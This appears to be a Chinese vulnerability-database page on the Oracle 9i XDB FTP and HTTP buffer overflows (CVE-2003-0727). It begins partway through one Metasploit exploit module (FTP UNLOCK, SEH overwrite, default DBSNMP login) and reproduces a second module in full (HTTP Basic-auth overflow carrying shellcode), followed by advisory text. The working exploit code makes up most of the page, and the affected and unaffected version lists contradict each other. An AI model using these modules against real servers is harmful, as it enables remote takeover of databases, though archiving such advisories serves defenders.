						'Oracle 9.2.0.1 Universal',
						{
							'Platform' => 'win',
							'Ret'      => 0x60616d46, # oraclient9.dll (pop/pop/ret) 
						},
					],
				],
			'DisclosureDate' => 'Aug 18 2003',
			'DefaultTarget' => 0))

			register_options( [
						Opt::RPORT(2100),
						OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']),
						OptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']),
					], self.class )
	end

	def check
		connect
		disconnect	
		if (banner =~ /9\.2\.0\.1\.0/)
			return Exploit::CheckCode::Vulnerable
		end		
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login
		
		print_status("Trying target #{target.name}...")

		buf          = rand_text_english(1130, payload_badchars)
		seh          = generate_seh_payload(target.ret) 
		buf[322, seh.length] = seh

		send_cmd( ['UNLOCK', '/', buf] , false )
		
		handler
		disconnect
	end

end
    

- 漏洞信息 (F82937)

Oracle 9i XDB HTTP PASS Overflow (win32) (PacketStormID:F82937)
2009-10-30 00:00:00
MC  metasploit.com
exploit,web,overflow,vulnerability
linux,windows
CVE-2003-0727
[点击下载]

This Metasploit module exploits a stack overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
			'Description'    => %q{
				This module exploits a stack overflow in the authorization
				code of the Oracle 9i HTTP XDB service. David Litchfield,
				has illustrated multiple vulnerabilities in the Oracle
				9i XML Database (XDB), during a seminar on "Variations
				in exploit methods between Linux and Windows" presented
				at the Blackhat conference.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2003-0727'],
	  				['OSVDB', '2449'],
					['BID', '8375'],
					['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ],
				],
			'DefaultTarget'  => 0,			
			'DisclosureDate' => 'Aug 18 2003'))
			
			register_options( [ Opt::RPORT(8080) ], self.class )

	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect
 
		if (resp =~ /9.2.0.1.0/)
			return Exploit::CheckCode::Vulnerable
		end                                                                               
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit =  rand_text_english(4, payload_badchars) + ":" 
		sploit << rand_text_english(442, payload_badchars) 
		sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V') 
		sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded

		req  = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n"  
		
		res  = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req   
	
		print_status("Trying target %s..." % target.name)
		
		sock.put(res)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

22265
Oracle9i XDB FTP Long Username/Password Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A remote overflow exists in Oracle9i Database Server. The XML Database (XDB) FTP service fails to perform proper bounds checking resulting in a stack-based buffer overflow. With a specially crafted request containing an overly long username or password, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2003-08-18 Unknow
2003-07-10 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Oracle has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Multiple Oracle XDB FTP / HTTP Services Buffer Overflow Vulnerabilities
Boundary Condition Error 8375
Yes Yes
2003-07-31 12:00:00 2009-11-26 07:15:00
Discovery of these vulnerabilities has been credited to David Litchfield(david@ngssoftware.com).

- 受影响的程序版本

Oracle Oracle9i Standard Edition 9.2 .0.1
Oracle Oracle9i Personal Edition 9.2 .0.1
Oracle Oracle9i Enterprise Edition 9.2 .0.1
Oracle Oracle9i Standard Edition 9.0 .2.4
Oracle Oracle9i Personal Edition 9.0 .2.4
Oracle Oracle9i Enterprise Edition 9.0 .2.4

- 不受影响的程序版本

Oracle Oracle9i Standard Edition 9.0 .2.4
Oracle Oracle9i Personal Edition 9.0 .2.4
Oracle Oracle9i Enterprise Edition 9.0 .2.4

- 漏洞讨论

In a paper titled "Variations in exploit methods between Linux and Windows" presented at Blackhat 2003, David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB).

Successful exploits may allow remote attackers to run arbitrary code in the security context of the vulnerable service.

- 漏洞利用

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Working exploits are available in the referenced paper by David Litchfield.

The following exploits have been made available for the Metasploit framework:

- 解决方案

Oracle has released patches to address these issues. See the referenced advisory (Oracle Security Alert 58) for details on obtaining and applying patches using the Oracle metalink site tool.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站